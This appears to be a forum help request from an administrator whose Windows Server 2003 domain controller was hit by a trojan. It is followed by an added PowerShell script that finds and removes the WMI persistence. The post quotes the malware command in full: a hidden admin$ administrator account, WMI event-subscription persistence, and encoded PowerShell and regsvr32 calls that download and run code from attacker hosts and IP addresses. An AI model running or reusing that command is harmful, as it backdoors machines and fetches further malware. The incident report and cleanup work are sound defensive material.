Guys, I am in need of urgent help. Our domain controller has been attacked by some trojan. The following script has run on the server as a service; I have disabled the script, but I guess the service has already polluted the computer:
Information
cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators admin$ /ad&net1 localgroup administradores admin$ /ad&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm3" DELETE&wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckyoumm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAd ABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB 3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnA GgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4 AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAK QAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAA lAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbA C0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGw AZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AO wB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll®svr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll®svr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll"&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="fuckyoumm3"", 
Consumer="CommandLineEventConsumer.Name="fuckyoumm 4""&start regsvr32 /s /u /n /i:http://173.208.172.202:8888\s1.txt scrobj.dll
Now our primary domain is not able to connect with the additional domain controller.
This virus is automatically changing the DNS.
We are not able to access our domain controllers through the Run command; however, we are able to access them through Remote Desktop.
Due to this trojan, users in the domain are not able to log in to their laptops.
URGENT help is needed. Our OS is Windows Server 2003.
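The quoted command installs WMI event-subscription persistence (a __EventFilter polling every 10800 seconds, a CommandLineEventConsumer, and a __FilterToConsumerBinding in root\subscription) plus a hidden admin$ administrator account. The following is an added defender-side inventory and cleanup script, not from the post; it assumes PowerShell 2.0 (Get-WmiObject) is installed on the Server 2003 hosts and is run as an administrator on every domain controller. Because the consumer re-downloads further stages (the DownloadString calls in the quoted script), removing the subscription is only the first step of remediation, not the whole of it.

```powershell
# Added example: inventory and remove the WMI persistence named in the quoted script.
# Assumptions (not from the post): PowerShell 2.0 present, run elevated on each DC.
$ns          = 'root\subscription'
$badFilter   = 'fuckyoumm3'   # __EventFilter name taken from the quoted command
$badConsumer = 'fuckyoumm4'   # consumer name taken from the quoted command

# 1. Inventory everything in the namespace first: legitimate subscriptions exist too,
#    and the malware may have been re-created under a different name.
Write-Host '=== __EventFilter ==='
Get-WmiObject -Namespace $ns -Class __EventFilter | Select-Object Name, Query | Format-List
Write-Host '=== CommandLineEventConsumer ==='
Get-WmiObject -Namespace $ns -Class CommandLineEventConsumer | Select-Object Name, CommandLineTemplate | Format-List
Write-Host '=== ActiveScriptEventConsumer ==='
Get-WmiObject -Namespace $ns -Class ActiveScriptEventConsumer | Select-Object Name, ScriptText | Format-List
Write-Host '=== __FilterToConsumerBinding ==='
Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding | Select-Object Filter, Consumer | Format-List

# 2. Delete the binding first so the consumer can no longer fire, then the consumer and filter.
Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding |
    Where-Object { $_.Filter -match $badFilter -or $_.Consumer -match $badConsumer } |
    ForEach-Object { Write-Host "Removing binding: $($_.Filter) -> $($_.Consumer)"; $_.Delete() }

foreach ($cls in 'CommandLineEventConsumer', 'ActiveScriptEventConsumer') {
    Get-WmiObject -Namespace $ns -Class $cls -Filter "Name='$badConsumer'" |
        ForEach-Object { Write-Host "Removing ${cls}: $($_.Name)"; $_.Delete() }
}
Get-WmiObject -Namespace $ns -Class __EventFilter -Filter "Name='$badFilter'" |
    ForEach-Object { Write-Host "Removing __EventFilter: $($_.Name)"; $_.Delete() }

# 3. The quoted script also created an administrator account "admin$"; report it so it can be removed.
$acct = Get-WmiObject -Class Win32_UserAccount -Filter "Name='admin`$'"
if ($acct) { Write-Host "Found account admin`$ (Domain: $($acct.Domain)) - remove it with: net user admin`$ /delete" }
else       { Write-Host 'No admin$ account found' }
```

Re-run the inventory section after cleanup and again a few hours later; if the entries reappear, another host or stage on the network is reinstalling them and must be found before the DCs can be considered clean.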